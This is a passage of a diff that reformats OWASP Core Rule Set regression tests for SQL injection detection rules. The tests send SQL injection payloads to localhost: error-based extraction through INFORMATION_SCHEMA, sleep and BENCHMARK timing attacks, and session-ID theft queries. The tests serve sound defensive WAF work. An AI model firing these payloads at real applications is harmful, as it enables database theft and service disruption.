dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute+elysi" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute node_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute scald" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute system" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute user_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute views" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute patha" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute workb" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute panel" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 45 desc: "SQL Injection Attack: EXISTS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" - version: HTTP/1.0 - output: - log_contains: id "942380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 62e8200bf..05ce6b989 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,23 +1,21 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942390.yaml +rule_id: 942390 tests: - - test_title: 942390-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942390] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 7845fb918..2de63c416 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942400.yaml +rule_id: 942400 tests: - - test_title: 942400-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" - - test_title: 942400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942400] + - test_id: 2 desc: "SQL Injection Attack - false positive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and 7 oranges" - version: HTTP/1.0 - output: - no_log_contains: id "942400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 75f566775..a3ee7e847 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -1,2013 +1,2011 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942410.yaml +rule_id: 942410 tests: - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 